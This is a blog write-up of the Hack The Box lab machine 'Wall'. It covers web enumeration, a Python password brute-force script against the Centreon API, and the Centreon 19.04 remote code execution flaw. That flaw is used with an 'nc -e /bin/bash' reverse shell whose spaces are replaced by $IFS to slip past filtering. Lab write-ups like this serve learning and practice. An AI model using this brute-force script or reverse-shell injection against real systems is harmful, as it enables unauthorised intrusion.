Wall HTB Writeup

Wall 🧱

From port scanning two ports are only available 22,80.

All I see in this port is the default page of apache2. So I fire up gobuster at this time.

gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.157/ -o port80, which gives me back:

/monitoring (401)

visiting /monitoring gives me a basic auth form, but I don’t know any logins,atm. So I run another gobuster but this time with .php extension.

gobuster dir -w /usr/share/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.157/ -o port80withphp -x .php gives me back:

aa.php
/monitoring
panel.php

aa.php === 1
panel.php === just a test for php file !

But again nothing of interest. I tried to brute force the /monitoring directory by using hydra even tho I didn’t knew a single username, but again i failed to find something.

I open the request to /monitoring using burp and change the request from GET /monitoring/ to POST /monitoring/ I get a redirect which sends me to /monitoring/'/centreon'.

We have a new directory: /centreon/

I search and find that I can use their api to send authentication requests, and at this time I create a script to do that for me:

import requests

URL = "http://10.10.10.157/centreon/api/index.php?action=authenticate"

with open('/home/fuxsocy/.local/share/Trash/files/rockyou.txt', 'r') as f:
	for i in f:
		i = i.strip('\n')
		PARAMS = {"username":"Admin", "password": i}
		r = requests.post(url = URL, data=PARAMS)
		if "Bad" in r.text:
			pass
		else:
			print("Found password: %s" % i)

The password is password1(Don’t ever use this as password PLEASE 😂).

I login using that password on the interface. Looking at the version I found out version 19.04 has a rce.

I follow this post https://shells.systems/centreon-v19-04-remote-code-execution-cve-2019-13024/.

Basically what you have to do to gain rce is to visit http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1 and at the Monitoring Engine Binary put a command, like you do on a terminal and then visit 10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php to get rce.

But putting nc -e /bin/bash {IP}, does not work. After trying I got it working by putting {$IFS} instead of a space.

The Internal Field Separator (IFS) that is used for word splitting after expansion and to split lines into words with the read builtin command.

Root

there is a screen vulnerability!

htb

Wall HTB Writeup

http://3rg1s.com/2020/01/31/2020-01-31-Wall/

Posted on

January 31, 2020

Licensed under

Networked HTB Writeup Previous

AI HTB Writeup Next